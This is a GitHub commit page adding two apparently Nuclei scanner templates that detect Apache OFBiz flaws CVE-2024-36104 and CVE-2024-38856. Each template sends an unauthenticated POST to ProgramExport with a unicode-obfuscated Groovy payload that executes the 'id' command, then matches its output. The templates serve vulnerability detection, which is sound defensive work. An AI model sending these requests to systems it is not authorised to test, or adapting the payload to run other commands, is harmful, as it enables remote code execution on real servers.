Skip to content

Commit

Permalink
Merge pull request #10464 from Co5mos/main
Browse files Browse the repository at this point in the history
Create CVE-2024-36104.yaml
  • Loading branch information
pussycat0x authored Aug 6, 2024
2 parents 52db17e + 21afa79 commit d4bdf78
Show file tree
Hide file tree
Showing 2 changed files with 98 additions and 0 deletions.
51 changes: 51 additions & 0 deletions http/cves/2024/CVE-2024-36104.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,51 @@
id: CVE-2024-36104

info:
name: Apache OFBiz - Path Traversal
author: Co5mos
severity: critical
description: |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.14. Users are recommended to upgrade to version 18.12.14, which fixes the issue.
reference:
- http://www.openwall.com/lists/oss-security/2024/06/03/1
- https://issues.apache.org/jira/browse/OFBIZ-13092
- https://lists.apache.org/thread/sv0xr8b1j7mmh5p37yldy9vmnzbodz2o
- https://ofbiz.apache.org/download.html
- https://ofbiz.apache.org/security.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-36104
cwe-id: CWE-22
epss-score: 0.00045
epss-percentile: 0.16306
metadata:
verified: true
max-request: 1
fofa-query: app="Apache_OFBiz"
tags: cve,cve2024,apache,obiz,lfi

http:
- raw:
- |
POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'

- type: word
part: body
words:
- 'java.lang.Exception'

- type: status
status:
- 200
47 changes: 47 additions & 0 deletions http/cves/2024/CVE-2024-38856.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,47 @@
id: CVE-2024-38856

info:
name: Apache OFBiz - Remote Code Execution
author: Co5mos
severity: critical
description: |
Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).
reference:
- https://unam4.github.io/2024/08/05/CVE-2024-38856-ofbiz-12-14-filter%E7%BB%95%E8%BF%87%E5%88%B0rce/
- https://issues.apache.org/jira/browse/OFBIZ-13128
- https://lists.apache.org/thread/olxxjk6b13sl3wh9cmp0k2dscvp24l7w
- https://ofbiz.apache.org/download.html
- https://ofbiz.apache.org/security.html
classification:
epss-score: 0.00045
epss-percentile: 0.16306
metadata:
verified: true
max-request: 1
fofa-query: app="Apache_OFBiz"
tags: cve,cve2024,ofbiz,apache,rce

http:
- raw:
- |
POST /webtools/control/main/ProgramExport HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'

- type: word
part: body
words:
- 'java.lang.Exception'

- type: status
status:
- 200

0 comments on commit d4bdf78

Please sign in to comment.